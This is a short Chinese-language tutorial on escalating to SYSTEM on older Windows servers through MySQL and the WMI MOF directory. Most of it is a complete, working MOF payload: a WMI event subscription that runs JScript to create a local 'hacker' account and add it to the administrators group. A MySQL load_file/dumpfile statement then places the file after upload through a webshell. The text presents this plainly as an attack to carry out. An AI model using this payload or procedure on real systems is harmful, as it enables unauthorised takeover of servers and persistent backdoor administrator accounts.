mof 提权的原理就是利用mof目录下的mof文件会一段时间后自动执行,且权限为system,我们就利用此处的。让他执行一些我们想要的命令。
条件
1、低于win2008版本.
2、数据库为 mysql<5.7且知道登录账号密码并且允许外连.
拿到root账号密码后可以开启外联。
这里使用webshell本地上传一个文件到服务器上去
test.mof
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hacker P@ssw0rd /add\")\nWSH.run(\"net.exe localgroup administrators hacker /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
然后用sql语句把他移动到 C:\WINDOWS\system32\wbem\mof
select load_file('C:/phpStudy/WWW/test.mof') into dumpfile 'C:/WINDOWS/system32/wbem/mof/test.mof'
然后hack账户就会被建立,并且在administartor组中